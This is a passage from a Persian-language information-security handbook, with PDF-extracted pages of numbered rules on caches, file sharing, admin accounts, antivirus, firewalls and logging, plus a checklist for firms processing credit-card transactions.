ﻣﻲ ﻛﻨﻴﺪ( ،ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ
ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻜﻨﻴﺪ.
ﻗﺎﻋﺪﺓ .۱۴ﭼﻨﺎﻧﭽﻪ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ
ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻣﺪ ،ﭘـﺲ ﺍﺯ ﺍﺗﻤـﺎﻡ
ﻛﺎﺭ ،ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ١٩٨ﺭﺍ ﭘـﺎﻙ ﻛﻨﻴـﺪ .ﺍﮔـﺮ ﻗـﺎﺩﺭ ﺑـﻪ
ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ
ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ( ﺷـﺎﻳﺪ ﺑﻬﺘــﺮ ﺑﺎﺷـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻛــﺎﺭ
ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﭙﺮﻫﻴﺰﻳﺪ.
197 HTML Fancy Scripts
198 Cache
ﻗﺎﻋﺪﺓ .۱۵ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳـﻞ ١٩٩ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨﻴـﺪ ،ﺁﻧـﺮﺍ
ﻏﻴﺮﻓﻌــﺎﻝ ﻛﻨﻴــﺪ .ﺍﮔــﺮ ﺍﺯ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳــﻞ ﺍﺳــﺘﻔﺎﺩﻩ
ﻣــﻲﻛﻨﻴــﺪ ،ﻧﺎﻣﻬــﺎﻱ ﻛــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ
ﻣﺴﺘﺤﻜﻢ ﺑﺮﮔﺰﻳﻨﻴـﺪ ﻭ ﻣﺠﻮﺯﻫـﺎﻱ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺗـﺎ
ﺣﺪﺍﻗﻞ ﻣﻤﻜﻦ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣـﻮﺭﺩ
ﻧﻈﺮ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻗﺎﻋﺪﺓ .۱۶ﺍﮔﺮ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮﻱ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ،
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ
ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ.
ﻗﺎﻋﺪﺓ .۱۷ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺁﻣـﺪ ﻭ ﻣﻔﻴـﺪ
ﺑﺎﺷﻨﺪ ،ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻣﺮﺍﻗﺒﺖ ﻭ ﺁﮔﺎﻫﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﻗﺎﻋﺪﺓ .۱۸ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻫﺒـﺮﻱ
ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ -ﻣﺜﻞ ﻣﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ -ﺣﺘـﻲ
ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻧﻴﺰ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺍﺯ ﺣـﺴﺎﺏ
ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ.
ﻗﺎﻋﺪﺓ .۱۹ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻳـﺎ
ﻛﺎﺭﺑﺮﺩ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﻗﺎﻋﺪﺓ .۲۰ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳﺮﻭﺱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺍﺳﺖ
ﺭﺍ ﺑﻪ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺿـﺪﻭﻳﺮﻭﺱ ﻣﺠﻬـﺰ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ
ﺩﺭﻳﺎﻓﺖ ﻧﺸﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻧﻪ
ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﻤﺎﻳﻴﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ
ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳـﺘﮕﺎﻩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ ﻭﺟـﻮﺩ ﻭﻳـﺮﻭﺱ،
ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ.
ﻗﺎﻋﺪﺓ .۲۱ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﺧـﺎﺹ ﺗﺤـﺖ
ﺗﻬﺎﺟﻢ ﻭﻳﺮﻭﺳﻬﺎ ﻗـﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ -ﻣﺜـﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ -ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ
ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ﻓﺮﺳـﺘﺎﺩﻩ
ﻣﻲﺷﻮﻧﺪ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻧﻤﻲﺑﺎﺷﻨﺪ ﻭ ﺑﺮﺍﻱ ﮔﻴﺮﻧﺪﻩ
ﺧﻄﺮﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﻧﺪ.
ﻗﺎﻋﺪﺓ .۲۲ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ
ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ،ﭼـﻪ ﺑـﺼﻮﺭﺕ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ
199 File Sharing
٢٠٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺗﻨﻬﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎ ﺩﺍﺩﻩﻫﺎ ﻛـﺎﺭ ﻛﻨﻨـﺪ
ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ
ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺟﺪﺍﮔﺎﻧــﻪ ﺑــﺮﺍﻱ ﻣﺤﺎﻓﻈــﺖ ﺍﺯ ﺗﻤــﺎﻡ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ.
ﻗﺎﻋﺪﺓ .۲۳ﺍﮔﺮ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ )ﺩﺭ ﺣﺎﻟﺖ ﺣـﺪﺍﻗﻠﻲ ،ﺷﻨﺎﺳـﺔ
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﻣﻨﺎﺳﺐ( ﺗﺎ ﻣﺒـﺎﺩﺍ ﻣﻬﺎﺟﻤـﺎﻥ ﻧﻴـﺰ ﺍﺯ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻨﺪ.
ﻗﺎﻋﺪﺓ .۲۴ﺛﺒــﺖ ﮔﺰﺍﺭﺷــﺎﺕ ﺑــﺮﺍﻱ ﻋﻤﻠﻜﺮﺩﻫــﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ
ﺳﻴﺴﺘﻢ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﻣﻨﻄﻘـﻲ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ .ﺍﻳـﻦ
ﮔﺰﺍﺭﺷﺎﺕ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ NTFSﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ(
•
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ،
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ،ﻭ ﺗﻤﺎﻡ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ
ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻣـﻦ ﻛـﺮﺩﻥ
ﻧﮕﺎﺭﺷــﻬﺎﻱ ﺟﺪﻳــﺪ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎ ﺁﺳــﺎﻧﺘﺮ ﺍﺯ
ﻧﮕﺎﺭﺷﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺳﺖ.
•
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ
ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
•
ﻱ ﻛﺎﺭﺗﻬــﺎﻱ
ﻱ ﻓﺎﻳﻠﻬــﺎﻱ ﺩﺍﺩﻩﺍ ﹺ
ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺬﺍﺭ ﹺ
ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ.
•
ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﻮﺩ ﻛـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ ٢٠٠ﺷـﺎﻣﻞ
ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻧﺸﺪﻩ ﻧﺒﺎﺷﻨﺪ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻴﺎﺯﻱ ﺑﻪ
ﺁﻧﻬﺎ ﻧﺒﺎﺷﺪ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﭘﺎﻙ ﺷﻮﻧﺪ،
ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺣﺬﻑ ﻛﺮﺩ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ
ﺑﺎﺯﻳﺎﺑﻲ ﻫﻢ ﻧﺒﺎﺷﻨﺪ.
•
ﺗﻤﺎﻡ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺣـﺴﺎﺱ ﺑﺎﻳـﺪ ﺩﺭ
ﻓﺎﻳﻠﻬﺎﻱ ﮔﺰﺍﺭﺵ ﺛﺒﺖ ﺷﻮﻧﺪ ،ﻭ ﺍﻳﻦ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﻳﺪ
ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻌﻴﻦ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ
ﺗﺎ ﻣﺸﻜﻼﺕ ﻳﺎ ﺧﻄﺎﻫﻬﺎﻱ ﺑـﺎﻟﻘﻮﻩ ﺁﺷـﻜﺎﺭ ﮔﺮﺩﻧـﺪ.
ﺍﻳﻦ ﮔﺰﺍﺭﺷﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺩﻭ ﻓﺎﻳﻞ ﺛﺒﺘﻬﺎ ﻧﻮﺷﺘﻪ ﺷﻮﻧﺪ ﻭ
ﺍﺯ ﻧﺴﺨﺔ ﺩﻭﻡ ﺑﺎﻳﺪ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻛـﻪ
ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ
ﻛﺮﺩ.
•
ﻲ ﻫـﺸﺪﺍﺭﻫﺎﻱ
ﻫﻤﻮﺍﺭﻩ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺍﮔﺮ ﻧﻘﻄﻪﺿﻌﻔﻲ ﮔﺰﺍﺭﺵ
ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺍﺣﻴﺎﻧﹰﺎ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻲﺷﺪ،
ﺳﺮﻳﻌﹰﺎ ﺍﺯ ﺁﻥ ﻣﻄﻠﻊ ﺷﻮﻳﺪ.
•
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ،ﺗﻤﺎﻡ ﺍﺣﺘﻴﺎﻃﻬـﺎﻱ ﻣﻤﻜـﻦ
ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﻓﻬﺮﺳﺖ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩﻛﻨﻨﺪﻩ ﺍﺯ
ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ
ﺍﻟﻒ( ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﻴﺴﺖ
•
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻠﻲ ﻧﮕﻬﺪﺍﺭﻱ ﺷـﻮﻧﺪ
ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ.
•
ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﻗﻔـﻞ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﻞ ﺍﻓـﺮﺍﺩ
ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺣـﺪﺍﻗ ﹺ
ﻣﻤﻜﻦ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻨﺪ.
•
ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻓﺮﺩ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ .ﺍﮔﺮ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺳﺘﺮﺳﻲ
ﻓﻴﺰﻳﻜﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧـﺮﺍ ﺑـﺎ ﻳـﻚ
ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ
ﻛﻨﻴــﺪ ﻭ ﺑﺪﻳﻨﻮﺳــﻴﻠﻪ ﺗﻤــﺎﻡ ﺳــﺪﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ
ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ )ﺑﺠــﺰ
ﺭﻣﺰﻧﮕﺎﺭﻱ( ﺭﺍ ﺩﻭﺭ ﺑﺰﻧﻴﺪ.
•
ﺟﻬﺖ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﺭ
ﺳﻄﺢ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ.
200 Temporary Files
ﺑﺨﺶ ﺳﻮﻡ
ﻗﺎﻋﺪﺓ .۲۵ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺭﻭﺷـﻬﺎ ﻭ
ﺁﺯﻣﻮﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ
ﺍﺷﻜﺎﻻﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﭘـﻴﺶ ﺍﺯ ﻭﻗـﻮﻉ ﺳـﺎﻧﺤﻪ ﺭﻓـﻊ
ﻛﻨﻴﺪ.
ﻣﺎﺷﻴﻨﻬﺎﻱ Windowsﺑﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺯ
٢٠٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ -
ﻣﺨﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ -ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ
ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ.
•
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻣﺜﻞ ﺩﺍﺩﻩ ﻫـﺎﻱ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻭ
ﺩﻳﮕﺮ ﺩﺍﺩﻩﻫﺎﻱ ﻣـﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ
ﺣﺬﻑ ﻣﻲ ﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺁﻥ ﺩﺍﺩﻩ ﺩﻳﮕـﺮ
ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ
ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ ﺳﺎﺩﺓ ﻓﺎﻳﻠﻬـﺎ ﺍﺳـﺖ .ﭼﻨﺎﻧﭽـﻪ
ﻧﻤﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﭼﻄـﻮﺭ ﺑـﺼﻮﺭﺕ ﻛﺎﻣـﻞ ﺍﺯ
ﺑﻴﻦ ﺑﺒﺮﻳﺪ ،ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺘﺨـﺼﺺ
ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ.
•
ﺩﺭ ﻓﻮﺍﺻﻞ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ
ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺍﻳﻤﻨﻲ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ
ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ.
•
ﺑﺎ ﺍﻧﺘـﺸﺎﺭ ﻳـﻚ "ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ" ﺑـﻪ
ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﭼﻪ ﺩﺍﺩﻩ ﻫﺎﻳﻲ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺯ
ﺁﻥ ﺑﺮﺍﻱ ﭼـﻪ ﻣﻨﻈـﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ،ﻭ
ﭼﮕﻮﻧﻪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ )ﻣﻲﺗﻮﺍﻧﻴﺪ
ﭼﮕﻮﻧﮕﻲ ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﻭ ﻣـﺒﻬﻢ ﺗﻮﺿـﻴﺢ
ﺩﻫﻴﺪ(.
•
ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﺮﺩﺍﺷﺖ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ ،ﺍﻋﺘﺒـﺎﺭ
ﺁﻧﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴـﺪ ﺍﻃﻤﻴﻨـﺎﻥ
ﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺧﻂ ﺍﺭﺗﺒـﺎﻃ ﹺ
ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ .ﺍﮔـﺮ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴـﺪ ،ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﻦ ﻛـﻪ ﺍﻣﻜـﺎﻥ
ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺍﺯ ﺑﻴﺮﻭﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
•
